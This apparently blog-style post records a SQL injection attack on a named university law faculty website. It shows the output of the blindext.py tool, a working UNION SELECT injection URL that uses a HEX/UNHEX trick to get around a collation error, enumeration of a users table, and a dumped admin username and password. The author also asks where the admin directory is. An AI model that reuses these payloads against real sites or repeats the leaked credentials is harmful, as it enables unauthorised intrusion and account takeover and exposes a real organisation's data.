Problem: where is the admin dir?
Tool: blindext.py (schemafuzz.py can't do it because of below restriction)
[+] URL: http://www.law.ui.ac.id/berita.php?bid=380
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v4.0.0 found!
[+] Showing database version, username@location, and database name!
[+] 15:08:22
[0]: 4.1.11-Debian_4sarge8-log:wwwlaw:wwwlaw
Database information = http://www.law.ui.ac.id/berita.php?bid=-380+union+select+1,2,UNHEX(HEX(concat_ws(char(58),database(),version(),user()))),4,5,6--
I use UNHEX & HEX because there is a conversion error if you don't use this "trick". The error message: Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
Dump:
[+] URL:http://www.law.ui.ac.id/berita.php?bid=380
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v4.0.0 found!
[14:30:33] StartTime
[+] Fuzzing Tables...
[Table]:users
[Column]:user_name
[Column]:user_password
[Column]:user_login
[Column]:user_id
[14:31:48] EndTime
[-] Total URL Requests 226
[-] Done
[+] URL:http://www.law.ui.ac.id/berita.php?bid=380
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v4.0.0 found!
[+] Dumping data from database "WWWLAW" Table "users"
[+] Column(s) ['user_login', 'user_password']
[+] 14:57:25
[+] Number of Rows: 4
[0]: admin:admiN
0 comments:
Post a Comment